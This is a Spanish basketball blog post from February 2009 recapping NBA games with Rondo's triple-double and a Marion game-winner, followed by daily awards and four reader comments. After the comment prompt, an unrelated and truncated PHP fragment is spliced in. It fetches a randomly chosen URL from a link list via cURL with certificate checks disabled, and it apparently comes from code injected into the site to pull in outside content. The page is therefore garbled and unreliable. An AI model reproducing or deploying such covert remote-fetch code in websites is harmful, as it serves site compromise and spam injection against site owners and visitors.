La crónica (12/02/09)

13 de February de 2009 por txusma

Casi por sorpresa comprobamos que hasta el día anterior al AllStar hay partidos de la NBA y que hay jugadores que a estas horas deben estar volando hasta Phoenix a toda velocidad porque esta noche tienen pachanguita (no se me ocurre otra calificación para el “Rookies vs Sophomores”). En todo caso, tampoco han sido partidos sin ninguna trascendencia así que echémosles un ojo:

La sorpresa la dieron los Warriors que desde la vuelta de Monta Ellis (23 de Enero contra los Cavs) han ganado más de la mitad de sus partidos. Ayer mismo el escolta del que se decía que peligraba su carrera deportiva por la lesión que se produjo en verano montando una scotter, anotó 8 de sus 20 puntos en los últimos 3 minutos de partido justo cuando los Blazers más apretaban. Sergio cuajó un buen partido (10 puntos, 7 asistencias y 4 rebotes) y Rudy se convirtió en el rookie que en más partidos consecutivos ha anotado, al menos, un triple. De momento lleva 30.

En el United Center de Chicago un mate en el último segundo de Shawn Marion dio la victoria a los Heat. Ben Gordon, que anotó 34 puntos en total, empató el partido a falta de 6 segundos con tres tiros libres consecutivos pero en la última jugada Wade demostró su inteligencia y aprovechándose de la atención que acaparaba por parte de todos los jugadores de los Bulls consiguió hacer llegar el balón a Marion que anotó con facilidad. Pasito atrás aunque medianamente previsible de los Bulls en sus aspiraciones de Playoffs.

Y en el partido a priori más interesante de la jornada un apoteósico Rajon Rondo, autor de un estratosférico triple doble (19 puntos, 15 rebotes y 14 asistencias) y un Paul Pierce que anotó 18 de sus 31 puntos en último cuarto,  lideraron a los Celtics en su victoria frente a los Mavs. Los verdes entraron en el último cuarto 8 abajo y con Garnett en el banco con problemas de faltas pero su fortaleza mental les permitió ponerse por delante por primera vez en el partido y ya no abandonar esa posición hasta el final. Enfrente, Dirk Nowitzki, autor de 37 puntos, lo contemplaba incrédulo.

PREMIOS

MVP: Los 2 candidatos son verdes. Por un lado los 18 puntos en el último cuarto de Paul Pierce y por el otro el increíble triple doble de Rajon Rondo. Repetimos de nuevo las cifras: 19-15-14. Al final del tercer cuarto Rondo ya lo había conseguido. ¿Alguien recuerda un triple doble de esta magnitud?

Rookie: Rose en su línea pero hoy merece ser nombrado rookie del día Michael Beasley que frente al mismo Rose anotó 21 puntos, recogió 7 rebotes y repartió ¡3 asistencias!. ¿Algo está cambiando en Beasley?

Sorpresa: Sin posibilidad de elegir ninguna sorpresa individual nos quedamos con la buena victoria y la racha de los Warriors que poquito a poquito vuelven a parecerse a los de temporadas anteriores. ¿Os imagináis a este equipo con Amare Stoudamire? Pánico.

Decepción: Para 2 titulares que acabaron con 0 puntos su actuación. Por un lado Nicolas Batum en un hecho que es bastante habitual en él y por el otro Kendrick Perkins que no vio aro en todo el partido.

El mayor esfuerzo en vano: Brandon Roy, Dirk Nowitzki y Ben Gordon. Todos anotaron 30 puntos y todos vieron como no sirvió de nada. Debe dar rabia.

Comenta

4 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    Es hablar Viva de que apuesta por los Bulls y se van para abajo.
    Empiezo a creer que es gafe.

      Citar

  2. Viva_Dirk dice:
    #2

    Han perdido un partido ¿eso es irse para abajo? Apuesto por ellos sin duda si Tyrus sigue jugando bien.

      Citar

  3. Llukas 70 dice:
    #3

    Yo tambien apuesto por los Bulls, no se si sera Derrick Rose o el espiritu de Jordan, pero este año apuesto por ellos. Aunque para esto no hay duda que necesitan la mejor version de Luol Deng, que me esta decepcionando mucho este año.

      Citar

  4. TheDeerHunter dice:
    #4

    Marion a los Raptors por “El Otro”

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>